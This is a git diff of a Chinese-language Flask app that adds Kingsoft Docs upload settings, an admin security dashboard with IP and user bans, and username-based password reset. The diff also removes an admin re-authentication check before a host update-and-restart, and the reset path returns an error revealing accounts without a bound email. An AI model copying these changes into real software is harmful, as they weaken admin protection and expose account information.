kdocs_enabled = 1 if kdocs_enabled else 0
if kdocs_enabled not in (0, 1):
return jsonify({"error": "表格上传开关必须是0或1"}), 400
if kdocs_doc_url is not None:
kdocs_doc_url = str(kdocs_doc_url or "").strip()
if kdocs_doc_url and not is_safe_outbound_url(kdocs_doc_url):
return jsonify({"error": "文档链接格式不正确"}), 400
if kdocs_default_unit is not None:
kdocs_default_unit = str(kdocs_default_unit or "").strip()
if len(kdocs_default_unit) > 50:
return jsonify({"error": "默认县区长度不能超过50"}), 400
if kdocs_sheet_name is not None:
kdocs_sheet_name = str(kdocs_sheet_name or "").strip()
if len(kdocs_sheet_name) > 50:
return jsonify({"error": "Sheet名称长度不能超过50"}), 400
if kdocs_sheet_index is not None:
try:
kdocs_sheet_index = int(kdocs_sheet_index)
except Exception:
return jsonify({"error": "Sheet序号必须是数字"}), 400
if kdocs_sheet_index < 0:
return jsonify({"error": "Sheet序号不能为负数"}), 400
if kdocs_unit_column is not None:
kdocs_unit_column = str(kdocs_unit_column or "").strip().upper()
if not kdocs_unit_column:
return jsonify({"error": "县区列不能为空"}), 400
import re
if not re.match(r"^[A-Z]{1,3}$", kdocs_unit_column):
return jsonify({"error": "县区列格式错误"}), 400
if kdocs_image_column is not None:
kdocs_image_column = str(kdocs_image_column or "").strip().upper()
if not kdocs_image_column:
return jsonify({"error": "图片列不能为空"}), 400
import re
if not re.match(r"^[A-Z]{1,3}$", kdocs_image_column):
return jsonify({"error": "图片列格式错误"}), 400
if kdocs_admin_notify_enabled is not None:
if isinstance(kdocs_admin_notify_enabled, bool):
kdocs_admin_notify_enabled = 1 if kdocs_admin_notify_enabled else 0
if kdocs_admin_notify_enabled not in (0, 1):
return jsonify({"error": "管理员通知开关必须是0或1"}), 400
if kdocs_admin_notify_email is not None:
kdocs_admin_notify_email = str(kdocs_admin_notify_email or "").strip()
if kdocs_admin_notify_email:
is_valid, error_msg = validate_email(kdocs_admin_notify_email)
if not is_valid:
return jsonify({"error": error_msg}), 400
if kdocs_row_start is not None:
try:
kdocs_row_start = int(kdocs_row_start)
except (ValueError, TypeError):
return jsonify({"error": "起始行必须是数字"}), 400
if kdocs_row_start < 0:
return jsonify({"error": "起始行不能为负数"}), 400
if kdocs_row_end is not None:
try:
kdocs_row_end = int(kdocs_row_end)
except (ValueError, TypeError):
return jsonify({"error": "结束行必须是数字"}), 400
if kdocs_row_end < 0:
return jsonify({"error": "结束行不能为负数"}), 400
old_config = database.get_system_config() or {} old_config = database.get_system_config() or {}
if not database.update_system_config( if not database.update_system_config(
@@ -564,9 +815,21 @@ def update_system_config_api():
schedule_weekdays=schedule_weekdays, schedule_weekdays=schedule_weekdays,
max_concurrent_per_account=new_max_concurrent_per_account, max_concurrent_per_account=new_max_concurrent_per_account,
max_screenshot_concurrent=new_max_screenshot_concurrent, max_screenshot_concurrent=new_max_screenshot_concurrent,
enable_screenshot=enable_screenshot,
auto_approve_enabled=auto_approve_enabled, auto_approve_enabled=auto_approve_enabled,
auto_approve_hourly_limit=auto_approve_hourly_limit, auto_approve_hourly_limit=auto_approve_hourly_limit,
auto_approve_vip_days=auto_approve_vip_days, auto_approve_vip_days=auto_approve_vip_days,
kdocs_enabled=kdocs_enabled,
kdocs_doc_url=kdocs_doc_url,
kdocs_default_unit=kdocs_default_unit,
kdocs_sheet_name=kdocs_sheet_name,
kdocs_sheet_index=kdocs_sheet_index,
kdocs_unit_column=kdocs_unit_column,
kdocs_image_column=kdocs_image_column,
kdocs_admin_notify_enabled=kdocs_admin_notify_enabled,
kdocs_admin_notify_email=kdocs_admin_notify_email,
kdocs_row_start=kdocs_row_start,
kdocs_row_end=kdocs_row_end,
): ):
return jsonify({"error": "更新失败"}), 400 return jsonify({"error": "更新失败"}), 400
@@ -577,6 +840,14 @@ def update_system_config_api():
max_global=int(new_config.get("max_concurrent_global", old_config.get("max_concurrent_global", 2))), max_global=int(new_config.get("max_concurrent_global", old_config.get("max_concurrent_global", 2))),
max_per_user=int(new_config.get("max_concurrent_per_account", old_config.get("max_concurrent_per_account", 1))), max_per_user=int(new_config.get("max_concurrent_per_account", old_config.get("max_concurrent_per_account", 1))),
) )
if new_max_screenshot_concurrent is not None:
try:
from browser_pool_worker import resize_browser_worker_pool
if resize_browser_worker_pool(int(new_config.get("max_screenshot_concurrent", new_max_screenshot_concurrent))):
logger.info(f"截图线程池并发已更新为: {new_config.get('max_screenshot_concurrent')}")
except Exception as pool_error:
logger.warning(f"截图线程池并发更新失败: {pool_error}")
except Exception: except Exception:
pass pass
@@ -590,6 +861,70 @@ def update_system_config_api():
return jsonify({"message": "系统配置已更新"}) return jsonify({"message": "系统配置已更新"})
@admin_api_bp.route("/kdocs/status", methods=["GET"])
@admin_required
def get_kdocs_status_api():
"""获取金山文档上传状态"""
try:
from services.kdocs_uploader import get_kdocs_uploader
uploader = get_kdocs_uploader()
status = uploader.get_status()
live = str(request.args.get("live", "")).lower() in ("1", "true", "yes")
if live:
live_status = uploader.refresh_login_status()
if live_status.get("success"):
logged_in = bool(live_status.get("logged_in"))
status["logged_in"] = logged_in
status["last_login_ok"] = logged_in
status["login_required"] = not logged_in
if live_status.get("error"):
status["last_error"] = live_status.get("error")
else:
status["logged_in"] = True if status.get("last_login_ok") else False if status.get("last_login_ok") is False else None
if status.get("last_login_ok") is True and status.get("last_error") == "操作超时":
status["last_error"] = None
return jsonify(status)
except Exception as e:
return jsonify({"error": f"获取状态失败: {e}"}), 500
@admin_api_bp.route("/kdocs/qr", methods=["POST"])
@admin_required
def get_kdocs_qr_api():
"""获取金山文档登录二维码"""
try:
from services.kdocs_uploader import get_kdocs_uploader
uploader = get_kdocs_uploader()
data = request.get_json(silent=True) or {}
force = bool(data.get("force"))
if not force:
force = str(request.args.get("force", "")).lower() in ("1", "true", "yes")
result = uploader.request_qr(force=force)
if not result.get("success"):
return jsonify({"error": result.get("error", "获取二维码失败")}), 400
return jsonify(result)
except Exception as e:
return jsonify({"error": f"获取二维码失败: {e}"}), 500
@admin_api_bp.route("/kdocs/clear-login", methods=["POST"])
@admin_required
def clear_kdocs_login_api():
"""清除金山文档登录态"""
try:
from services.kdocs_uploader import get_kdocs_uploader
uploader = get_kdocs_uploader()
result = uploader.clear_login()
if not result.get("success"):
return jsonify({"error": result.get("error", "清除失败")}), 400
return jsonify({"success": True})
except Exception as e:
return jsonify({"error": f"清除失败: {e}"}), 500
@admin_api_bp.route("/schedule/execute", methods=["POST"]) @admin_api_bp.route("/schedule/execute", methods=["POST"])
@admin_required @admin_required
def execute_schedule_now(): def execute_schedule_now():
@@ -673,7 +1008,7 @@ def get_server_info_api():
"""获取服务器信息""" """获取服务器信息"""
import psutil import psutil
cpu_percent = psutil.cpu_percent(interval=1) cpu_percent = _get_server_cpu_percent()
memory = psutil.virtual_memory() memory = psutil.virtual_memory()
memory_total = f"{memory.total / (1024**3):.1f}GB" memory_total = f"{memory.total / (1024**3):.1f}GB"
@@ -776,20 +1111,31 @@ def get_running_tasks_api():
@admin_required @admin_required
def get_task_logs_api(): def get_task_logs_api():
"""获取任务日志列表(支持分页和多种筛选)""" """获取任务日志列表(支持分页和多种筛选)"""
try:
limit = int(request.args.get("limit", 20)) limit = int(request.args.get("limit", 20))
limit = max(1, min(limit, 200)) # 限制 1-200 条
except (ValueError, TypeError):
limit = 20
try:
offset = int(request.args.get("offset", 0)) offset = int(request.args.get("offset", 0))
offset = max(0, offset)
except (ValueError, TypeError):
offset = 0
date_filter = request.args.get("date") date_filter = request.args.get("date")
status_filter = request.args.get("status") status_filter = request.args.get("status")
source_filter = request.args.get("source") source_filter = request.args.get("source")
user_id_filter = request.args.get("user_id") user_id_filter = request.args.get("user_id")
account_filter = request.args.get("account") account_filter = (request.args.get("account") or "").strip()
if user_id_filter: if user_id_filter:
try: try:
user_id_filter = int(user_id_filter) user_id_filter = int(user_id_filter)
except ValueError: except (ValueError, TypeError):
user_id_filter = None user_id_filter = None
try:
result = database.get_task_logs( result = database.get_task_logs(
limit=limit, limit=limit,
offset=offset, offset=offset,
@@ -797,9 +1143,12 @@ def get_task_logs_api():
status_filter=status_filter, status_filter=status_filter,
source_filter=source_filter, source_filter=source_filter,
user_id_filter=user_id_filter, user_id_filter=user_id_filter,
account_filter=account_filter, account_filter=account_filter if account_filter else None,
) )
return jsonify(result) return jsonify(result)
except Exception as e:
logger.error(f"获取任务日志失败: {e}")
return jsonify({"logs": [], "total": 0, "error": "查询失败"})
@admin_api_bp.route("/task/logs/clear", methods=["POST"]) @admin_api_bp.route("/task/logs/clear", methods=["POST"])
@@ -910,32 +1259,6 @@ def admin_reset_password_route(user_id):
return jsonify({"error": "重置失败,用户不存在"}), 400 return jsonify({"error": "重置失败,用户不存在"}), 400
@admin_api_bp.route("/password_resets", methods=["GET"])
@admin_required
def get_password_resets_route():
"""获取所有待审核的密码重置申请"""
resets = database.get_pending_password_resets()
return jsonify(resets)
@admin_api_bp.route("/password_resets/<int:request_id>/approve", methods=["POST"])
@admin_required
def approve_password_reset_route(request_id):
"""批准密码重置申请"""
if database.approve_password_reset(request_id):
return jsonify({"message": "密码重置申请已批准"})
return jsonify({"error": "批准失败"}), 400
@admin_api_bp.route("/password_resets/<int:request_id>/reject", methods=["POST"])
@admin_required
def reject_password_reset_route(request_id):
"""拒绝密码重置申请"""
if database.reject_password_reset(request_id):
return jsonify({"message": "密码重置申请已拒绝"})
return jsonify({"error": "拒绝失败"}), 400
@admin_api_bp.route("/feedbacks", methods=["GET"]) @admin_api_bp.route("/feedbacks", methods=["GET"])
@admin_required @admin_required
def get_all_feedbacks(): def get_all_feedbacks():
@@ -1067,6 +1390,7 @@ def update_email_settings_api():
enabled = data.get("enabled", False) enabled = data.get("enabled", False)
failover_enabled = data.get("failover_enabled", True) failover_enabled = data.get("failover_enabled", True)
register_verify_enabled = data.get("register_verify_enabled") register_verify_enabled = data.get("register_verify_enabled")
login_alert_enabled = data.get("login_alert_enabled")
base_url = data.get("base_url") base_url = data.get("base_url")
task_notify_enabled = data.get("task_notify_enabled") task_notify_enabled = data.get("task_notify_enabled")
@@ -1074,6 +1398,7 @@ def update_email_settings_api():
enabled=enabled, enabled=enabled,
failover_enabled=failover_enabled, failover_enabled=failover_enabled,
register_verify_enabled=register_verify_enabled, register_verify_enabled=register_verify_enabled,
login_alert_enabled=login_alert_enabled,
base_url=base_url, base_url=base_url,
task_notify_enabled=task_notify_enabled, task_notify_enabled=task_notify_enabled,
) )

View File

@@ -0,0 +1,348 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from typing import Any
from flask import Blueprint, jsonify, request
import db_pool
from db import security as security_db
from routes.decorators import admin_required
from security import BlacklistManager, RiskScorer
security_bp = Blueprint("admin_security", __name__)
blacklist = BlacklistManager()
scorer = RiskScorer(blacklist_manager=blacklist)
def _truncate(value: Any, max_len: int = 200) -> str:
text = str(value or "")
if max_len <= 0:
return ""
if len(text) <= max_len:
return text
return text[: max(0, max_len - 3)] + "..."
def _parse_int_arg(name: str, default: int, *, min_value: int | None = None, max_value: int | None = None) -> int:
raw = request.args.get(name, None)
if raw is None or str(raw).strip() == "":
value = int(default)
else:
try:
value = int(str(raw).strip())
except Exception:
value = int(default)
if min_value is not None:
value = max(int(min_value), value)
if max_value is not None:
value = min(int(max_value), value)
return value
def _parse_json() -> dict:
if request.is_json:
data = request.get_json(silent=True) or {}
return data if isinstance(data, dict) else {}
# 兼容 form-data
try:
return dict(request.form or {})
except Exception:
return {}
def _parse_bool(value: Any) -> bool:
if isinstance(value, bool):
return value
if isinstance(value, int):
return value != 0
text = str(value or "").strip().lower()
return text in {"1", "true", "yes", "y", "on"}
def _sanitize_threat_event(event: dict) -> dict:
return {
"id": event.get("id"),
"threat_type": event.get("threat_type") or "unknown",
"score": int(event.get("score") or 0),
"ip": _truncate(event.get("ip"), 64),
"user_id": event.get("user_id"),
"request_method": _truncate(event.get("request_method"), 16),
"request_path": _truncate(event.get("request_path"), 256),
"field_name": _truncate(event.get("field_name"), 80),
"rule": _truncate(event.get("rule"), 120),
"matched": _truncate(event.get("matched"), 120),
"value_preview": _truncate(event.get("value_preview"), 200),
"created_at": event.get("created_at"),
}
def _sanitize_ban_entry(entry: dict, *, kind: str) -> dict:
if kind == "ip":
return {
"ip": _truncate(entry.get("ip"), 64),
"reason": _truncate(entry.get("reason"), 200),
"added_at": entry.get("added_at"),
"expires_at": entry.get("expires_at"),
"is_active": int(entry.get("is_active") or 0),
}
if kind == "user":
return {
"user_id": entry.get("user_id"),
"reason": _truncate(entry.get("reason"), 200),
"added_at": entry.get("added_at"),
"expires_at": entry.get("expires_at"),
"is_active": int(entry.get("is_active") or 0),
}
return {}
@security_bp.route("/api/admin/security/dashboard", methods=["GET"])
@admin_required
def get_security_dashboard():
"""
获取安全仪表板数据
返回:
- 最近24小时威胁事件数
- 当前封禁IP数
- 当前封禁用户数
- 最近10条威胁事件
"""
try:
threat_24h = security_db.get_threat_events_count(hours=24)
except Exception:
threat_24h = 0
try:
banned_ips = blacklist.get_banned_ips()
except Exception:
banned_ips = []
try:
banned_users = blacklist.get_banned_users()
except Exception:
banned_users = []
try:
recent = security_db.get_threat_events_list(page=1, per_page=10, filters={}).get("items", [])
recent_items = [_sanitize_threat_event(e) for e in recent if isinstance(e, dict)]
except Exception:
recent_items = []
return jsonify(
{
"threat_events_24h": int(threat_24h or 0),
"banned_ip_count": len(banned_ips),
"banned_user_count": len(banned_users),
"recent_threat_events": recent_items,
}
)
@security_bp.route("/api/admin/security/threats", methods=["GET"])
@admin_required
def get_threat_events():
"""
获取威胁事件列表(分页)
参数: page, per_page, severity, event_type
"""
page = _parse_int_arg("page", 1, min_value=1, max_value=100000)
per_page = _parse_int_arg("per_page", 20, min_value=1, max_value=200)
severity = (request.args.get("severity") or "").strip()
event_type = (request.args.get("event_type") or "").strip()
filters: dict[str, Any] = {}
if severity:
filters["severity"] = severity
if event_type:
filters["event_type"] = event_type
data = security_db.get_threat_events_list(page, per_page, filters)
items = data.get("items") or []
data["items"] = [_sanitize_threat_event(e) for e in items if isinstance(e, dict)]
return jsonify(data)
@security_bp.route("/api/admin/security/banned-ips", methods=["GET"])
@admin_required
def get_banned_ips():
"""获取封禁IP列表"""
items = blacklist.get_banned_ips()
return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="ip") for x in items]})
@security_bp.route("/api/admin/security/banned-users", methods=["GET"])
@admin_required
def get_banned_users():
"""获取封禁用户列表"""
items = blacklist.get_banned_users()
return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="user") for x in items]})
@security_bp.route("/api/admin/security/ban-ip", methods=["POST"])
@admin_required
def ban_ip():
"""
手动封禁IP
参数: ip, reason, duration_hours(可选), permanent(可选)
"""
data = _parse_json()
ip = str(data.get("ip") or "").strip()
reason = str(data.get("reason") or "").strip()
duration_hours_raw = data.get("duration_hours", 24)
permanent = _parse_bool(data.get("permanent", False))
if not ip:
return jsonify({"error": "ip不能为空"}), 400
if not reason:
return jsonify({"error": "reason不能为空"}), 400
try:
duration_hours = max(1, int(duration_hours_raw))
except Exception:
duration_hours = 24
ok = blacklist.ban_ip(ip, reason, duration_hours=duration_hours, permanent=permanent)
if not ok:
return jsonify({"error": "封禁失败"}), 400
return jsonify({"success": True})
@security_bp.route("/api/admin/security/unban-ip", methods=["POST"])
@admin_required
def unban_ip():
"""解除IP封禁"""
data = _parse_json()
ip = str(data.get("ip") or "").strip()
if not ip:
return jsonify({"error": "ip不能为空"}), 400
ok = blacklist.unban_ip(ip)
if not ok:
return jsonify({"error": "未找到封禁记录"}), 404
return jsonify({"success": True})
@security_bp.route("/api/admin/security/ban-user", methods=["POST"])
@admin_required
def ban_user():
"""手动封禁用户"""
data = _parse_json()
user_id_raw = data.get("user_id")
reason = str(data.get("reason") or "").strip()
duration_hours_raw = data.get("duration_hours", 24)
permanent = _parse_bool(data.get("permanent", False))
try:
user_id = int(user_id_raw)
except Exception:
user_id = None
if user_id is None:
return jsonify({"error": "user_id不能为空"}), 400
if not reason:
return jsonify({"error": "reason不能为空"}), 400
try:
duration_hours = max(1, int(duration_hours_raw))
except Exception:
duration_hours = 24
ok = blacklist._ban_user_internal(user_id, reason=reason, duration_hours=duration_hours, permanent=permanent)
if not ok:
return jsonify({"error": "封禁失败"}), 400
return jsonify({"success": True})
@security_bp.route("/api/admin/security/unban-user", methods=["POST"])
@admin_required
def unban_user():
"""解除用户封禁"""
data = _parse_json()
user_id_raw = data.get("user_id")
try:
user_id = int(user_id_raw)
except Exception:
user_id = None
if user_id is None:
return jsonify({"error": "user_id不能为空"}), 400
ok = blacklist.unban_user(user_id)
if not ok:
return jsonify({"error": "未找到封禁记录"}), 404
return jsonify({"success": True})
@security_bp.route("/api/admin/security/ip-risk/<ip>", methods=["GET"])
@admin_required
def get_ip_risk(ip):
"""获取指定IP的风险评分和历史事件"""
ip_text = str(ip or "").strip()
if not ip_text:
return jsonify({"error": "ip不能为空"}), 400
history = security_db.get_ip_threat_history(ip_text)
return jsonify(
{
"ip": _truncate(ip_text, 64),
"risk_score": int(scorer.get_ip_score(ip_text) or 0),
"is_banned": bool(blacklist.is_ip_banned(ip_text)),
"threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)],
}
)
@security_bp.route("/api/admin/security/ip-risk/clear", methods=["POST"])
@admin_required
def clear_ip_risk():
"""清除指定IP的风险分"""
data = _parse_json()
ip_text = str(data.get("ip") or "").strip()
if not ip_text:
return jsonify({"error": "ip不能为空"}), 400
if not scorer.reset_ip_score(ip_text):
return jsonify({"error": "清理失败"}), 400
return jsonify({"success": True, "ip": _truncate(ip_text, 64), "risk_score": 0})
@security_bp.route("/api/admin/security/user-risk/<int:user_id>", methods=["GET"])
@admin_required
def get_user_risk(user_id):
"""获取指定用户的风险评分和历史事件"""
history = security_db.get_user_threat_history(user_id)
return jsonify(
{
"user_id": int(user_id),
"risk_score": int(scorer.get_user_score(user_id) or 0),
"is_banned": bool(blacklist.is_user_banned(user_id)),
"threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)],
}
)
@security_bp.route("/api/admin/security/cleanup", methods=["POST"])
@admin_required
def cleanup_expired():
"""清理过期的封禁记录和衰减风险分"""
try:
blacklist.cleanup_expired()
except Exception:
pass
try:
scorer.decay_scores()
except Exception:
pass
# 可选:返回当前连接池统计信息,便于排查后台运行状态
pool_stats = None
try:
pool_stats = db_pool.get_pool_stats()
except Exception:
pool_stats = None
return jsonify({"success": True, "pool_stats": pool_stats})

View File

@@ -3,7 +3,6 @@
from __future__ import annotations from __future__ import annotations
import os import os
import time
import uuid import uuid
from flask import jsonify, request, session from flask import jsonify, request, session
@@ -66,13 +65,6 @@ def _parse_bool_field(data: dict, key: str) -> bool | None:
raise ValueError(f"{key} 必须是 0/1 或 true/false") raise ValueError(f"{key} 必须是 0/1 或 true/false")
def _admin_reauth_required() -> bool:
try:
return time.time() > float(session.get("admin_reauth_until", 0) or 0)
except Exception:
return True
@admin_api_bp.route("/update/status", methods=["GET"]) @admin_api_bp.route("/update/status", methods=["GET"])
@admin_required @admin_required
def get_update_status_api(): def get_update_status_api():
@@ -154,8 +146,6 @@ def request_update_check_api():
def request_update_run_api(): def request_update_run_api():
"""请求宿主机 Update-Agent 执行一键更新并重启服务。""" """请求宿主机 Update-Agent 执行一键更新并重启服务。"""
ensure_update_dirs() ensure_update_dirs()
if _admin_reauth_required():
return jsonify({"error": "需要二次确认", "code": "reauth_required"}), 401
if _has_pending_request(): if _has_pending_request():
return jsonify({"error": "已有更新请求正在处理中,请稍后再试"}), 409 return jsonify({"error": "已有更新请求正在处理中,请稍后再试"}), 409

View File

@@ -11,7 +11,6 @@ from crypto_utils import encrypt_password as encrypt_account_password
from flask import Blueprint, jsonify, request from flask import Blueprint, jsonify, request
from flask_login import current_user, login_required from flask_login import current_user, login_required
from services.accounts_service import load_user_accounts from services.accounts_service import load_user_accounts
from services.browser_manager import init_browser_manager_async
from services.browse_types import BROWSE_TYPE_SHOULD_READ, normalize_browse_type, validate_browse_type from services.browse_types import BROWSE_TYPE_SHOULD_READ, normalize_browse_type, validate_browse_type
from services.client_log import log_to_client from services.client_log import log_to_client
from services.models import Account from services.models import Account
@@ -230,10 +229,6 @@ def start_account(account_id):
if not browse_type: if not browse_type:
return jsonify({"error": "浏览类型无效"}), 400 return jsonify({"error": "浏览类型无效"}), 400
enable_screenshot = data.get("enable_screenshot", True) enable_screenshot = data.get("enable_screenshot", True)
if enable_screenshot:
# 异步初始化浏览器环境,避免首次下载/安装 Chromium 阻塞请求导致“网页无响应”
init_browser_manager_async()
ok, message = submit_account_task( ok, message = submit_account_task(
user_id=user_id, user_id=user_id,
account_id=account_id, account_id=account_id,
@@ -308,9 +303,6 @@ def manual_screenshot(account_id):
account.last_browse_type = browse_type account.last_browse_type = browse_type
# 异步初始化浏览器环境,避免首次下载/安装 Chromium 阻塞请求
init_browser_manager_async()
threading.Thread( threading.Thread(
target=take_screenshot_for_account, target=take_screenshot_for_account,
args=(user_id, account_id, browse_type, "manual_screenshot"), args=(user_id, account_id, browse_type, "manual_screenshot"),
@@ -336,10 +328,6 @@ def batch_start_accounts():
if not account_ids: if not account_ids:
return jsonify({"error": "请选择要启动的账号"}), 400 return jsonify({"error": "请选择要启动的账号"}), 400
if enable_screenshot:
# 异步初始化浏览器环境,避免首次下载/安装 Chromium 阻塞请求
init_browser_manager_async()
started = [] started = []
failed = [] failed = []

View File

@@ -237,12 +237,19 @@ def forgot_password():
"""发送密码重置邮件""" """发送密码重置邮件"""
data = request.json or {} data = request.json or {}
email = data.get("email", "").strip().lower() email = data.get("email", "").strip().lower()
username = data.get("username", "").strip()
captcha_session = data.get("captcha_session", "") captcha_session = data.get("captcha_session", "")
captcha_code = data.get("captcha", "").strip() captcha_code = data.get("captcha", "").strip()
if not email: if not email and not username:
return jsonify({"error": "请输入邮箱"}), 400 return jsonify({"error": "请输入邮箱或用户名"}), 400
if username:
is_valid, error_msg = validate_username(username)
if not is_valid:
return jsonify({"error": error_msg}), 400
if email:
is_valid, error_msg = validate_email(email) is_valid, error_msg = validate_email(email)
if not is_valid: if not is_valid:
return jsonify({"error": error_msg}), 400 return jsonify({"error": error_msg}), 400
@@ -251,6 +258,7 @@ def forgot_password():
allowed, error_msg = check_ip_request_rate(client_ip, "email") allowed, error_msg = check_ip_request_rate(client_ip, "email")
if not allowed: if not allowed:
return jsonify({"error": error_msg}), 429 return jsonify({"error": error_msg}), 429
if email:
allowed, error_msg = check_email_rate_limit(email, "forgot_password") allowed, error_msg = check_email_rate_limit(email, "forgot_password")
if not allowed: if not allowed:
return jsonify({"error": error_msg}), 429 return jsonify({"error": error_msg}), 429
@@ -266,6 +274,34 @@ def forgot_password():
if not email_settings.get("enabled", False): if not email_settings.get("enabled", False):
return jsonify({"error": "邮件功能未启用,请联系管理员"}), 400 return jsonify({"error": "邮件功能未启用,请联系管理员"}), 400
if username:
user = database.get_user_by_username(username)
if user and user.get("status") == "approved":
bound_email = (user.get("email") or "").strip()
if not bound_email:
return (
jsonify(
{
"error": "您尚未绑定邮箱,无法通过邮箱找回密码。请联系管理员重置密码。",
"code": "email_not_bound",
}
),
400,
)
allowed, error_msg = check_email_rate_limit(bound_email, "forgot_password")
if not allowed:
return jsonify({"error": error_msg}), 429
result = email_service.send_password_reset_email(
email=bound_email,
username=user["username"],
user_id=user["id"],
)
if not result["success"]:
logger.error(f"密码重置邮件发送失败: {result['error']}")
return jsonify({"success": True, "message": "如果该账号已绑定邮箱,您将收到密码重置邮件"})
user = database.get_user_by_email(email) user = database.get_user_by_email(email)
if user and user.get("status") == "approved": if user and user.get("status") == "approved":
result = email_service.send_password_reset_email(email=email, username=user["username"], user_id=user["id"]) result = email_service.send_password_reset_email(email=email, username=user["username"], user_id=user["id"])
@@ -317,46 +353,6 @@ def reset_password_confirm():
return jsonify({"error": "密码重置失败"}), 500 return jsonify({"error": "密码重置失败"}), 500
@api_auth_bp.route("/api/reset_password_request", methods=["POST"])
def request_password_reset():
"""用户申请重置密码(需要审核)"""
data = request.json or {}
username = data.get("username", "").strip()
email = data.get("email", "").strip().lower()
new_password = data.get("new_password", "").strip()
if not username or not new_password:
return jsonify({"error": "用户名和新密码不能为空"}), 400
is_valid, error_msg = validate_password(new_password)
if not is_valid:
return jsonify({"error": error_msg}), 400
if email:
is_valid, error_msg = validate_email(email)
if not is_valid:
return jsonify({"error": error_msg}), 400
client_ip = get_rate_limit_ip()
allowed, error_msg = check_ip_request_rate(client_ip, "email")
if not allowed:
return jsonify({"error": error_msg}), 429
if email:
allowed, error_msg = check_email_rate_limit(email, "reset_request")
if not allowed:
return jsonify({"error": error_msg}), 429
user = database.get_user_by_username(username)
if user:
if email and user.get("email") != email:
pass
else:
database.create_password_reset_request(user["id"], new_password)
return jsonify({"message": "如果账号存在,密码重置申请已提交,请等待管理员审核"})
@api_auth_bp.route("/api/generate_captcha", methods=["POST"]) @api_auth_bp.route("/api/generate_captcha", methods=["POST"])
def generate_captcha(): def generate_captcha():
"""生成4位数字验证码图片""" """生成4位数字验证码图片"""
@@ -484,7 +480,11 @@ def login():
user_agent = request.headers.get("User-Agent", "") user_agent = request.headers.get("User-Agent", "")
context = database.record_login_context(user["id"], client_ip, user_agent) context = database.record_login_context(user["id"], client_ip, user_agent)
if context and (context.get("new_ip") or context.get("new_device")): if context and (context.get("new_ip") or context.get("new_device")):
if config.LOGIN_ALERT_ENABLED and should_send_login_alert(user["id"], client_ip): if (
config.LOGIN_ALERT_ENABLED
and should_send_login_alert(user["id"], client_ip)
and email_service.get_email_settings().get("login_alert_enabled", True)
):
user_info = database.get_user_by_id(user["id"]) or {} user_info = database.get_user_by_id(user["id"]) or {}
if user_info.get("email") and user_info.get("email_verified"): if user_info.get("email") and user_info.get("email_verified"):
if database.get_user_email_notify(user["id"]): if database.get_user_email_notify(user["id"]):

View File

@@ -35,6 +35,7 @@ def get_active_announcement():
"id": announcement.get("id"), "id": announcement.get("id"),
"title": announcement.get("title", ""), "title": announcement.get("title", ""),
"content": announcement.get("content", ""), "content": announcement.get("content", ""),
"image_url": announcement.get("image_url") or "",
"created_at": announcement.get("created_at"), "created_at": announcement.get("created_at"),
} }
} }
@@ -147,6 +148,50 @@ def get_user_email():
return jsonify({"email": user.get("email", ""), "email_verified": user.get("email_verified", False)}) return jsonify({"email": user.get("email", ""), "email_verified": user.get("email_verified", False)})
@api_user_bp.route("/api/user/kdocs", methods=["GET"])
@login_required
def get_user_kdocs_settings():
"""获取当前用户的金山文档设置"""
settings = database.get_user_kdocs_settings(current_user.id)
if not settings:
return jsonify({"kdocs_unit": "", "kdocs_auto_upload": 0})
return jsonify(settings)
@api_user_bp.route("/api/user/kdocs", methods=["POST"])
@login_required
def update_user_kdocs_settings():
"""更新当前用户的金山文档设置"""
data = request.get_json() or {}
kdocs_unit = data.get("kdocs_unit")
kdocs_auto_upload = data.get("kdocs_auto_upload")
if kdocs_unit is not None:
kdocs_unit = str(kdocs_unit or "").strip()
if len(kdocs_unit) > 50:
return jsonify({"error": "县区长度不能超过50"}), 400
if kdocs_auto_upload is not None:
if isinstance(kdocs_auto_upload, bool):
kdocs_auto_upload = 1 if kdocs_auto_upload else 0
try:
kdocs_auto_upload = int(kdocs_auto_upload)
except Exception:
return jsonify({"error": "自动上传开关必须是0或1"}), 400
if kdocs_auto_upload not in (0, 1):
return jsonify({"error": "自动上传开关必须是0或1"}), 400
if not database.update_user_kdocs_settings(
current_user.id,
kdocs_unit=kdocs_unit,
kdocs_auto_upload=kdocs_auto_upload,
):
return jsonify({"error": "更新失败"}), 400
settings = database.get_user_kdocs_settings(current_user.id) or {"kdocs_unit": "", "kdocs_auto_upload": 0}
return jsonify({"success": True, "settings": settings})
@api_user_bp.route("/api/user/bind-email", methods=["POST"]) @api_user_bp.route("/api/user/bind-email", methods=["POST"])
@login_required @login_required
@require_ip_not_locked @require_ip_not_locked
@@ -303,3 +348,37 @@ def get_run_stats():
"today_attachments": stats.get("total_attachments", 0), "today_attachments": stats.get("total_attachments", 0),
} }
) )
@api_user_bp.route("/api/kdocs/status", methods=["GET"])
@login_required
def get_kdocs_status_for_user():
"""获取金山文档在线状态(用户端简化版)"""
try:
# 检查系统是否启用了金山文档功能
cfg = database.get_system_config() or {}
kdocs_enabled = int(cfg.get("kdocs_enabled") or 0)
if not kdocs_enabled:
return jsonify({"enabled": False, "online": False, "message": "未启用"})
# 获取金山文档状态
from services.kdocs_uploader import get_kdocs_uploader
kdocs = get_kdocs_uploader()
status = kdocs.get_status()
login_required_flag = status.get("login_required", False)
last_login_ok = status.get("last_login_ok")
# 判断是否在线
is_online = not login_required_flag and last_login_ok is True
return jsonify({
"enabled": True,
"online": is_online,
"message": "就绪" if is_online else "离线"
})
except Exception as e:
logger.error(f"获取金山文档状态失败: {e}")
return jsonify({"enabled": False, "online": False, "message": "获取失败"})

View File

@@ -14,11 +14,20 @@ def admin_required(f):
@wraps(f) @wraps(f)
def decorated_function(*args, **kwargs): def decorated_function(*args, **kwargs):
try:
logger = get_logger() logger = get_logger()
except Exception:
import logging
logger = logging.getLogger("app")
logger.debug(f"[admin_required] 检查会话admin_id存在: {'admin_id' in session}") logger.debug(f"[admin_required] 检查会话admin_id存在: {'admin_id' in session}")
if "admin_id" not in session: if "admin_id" not in session:
logger.warning(f"[admin_required] 拒绝访问 {request.path} - session中无admin_id") logger.warning(f"[admin_required] 拒绝访问 {request.path} - session中无admin_id")
is_api = request.blueprint == "admin_api" or request.path.startswith("/yuyx/api") is_api = (
request.blueprint in {"admin_api", "admin_security", "admin_security_yuyx"}
or request.path.startswith("/yuyx/api")
or request.path.startswith("/api/admin")
)
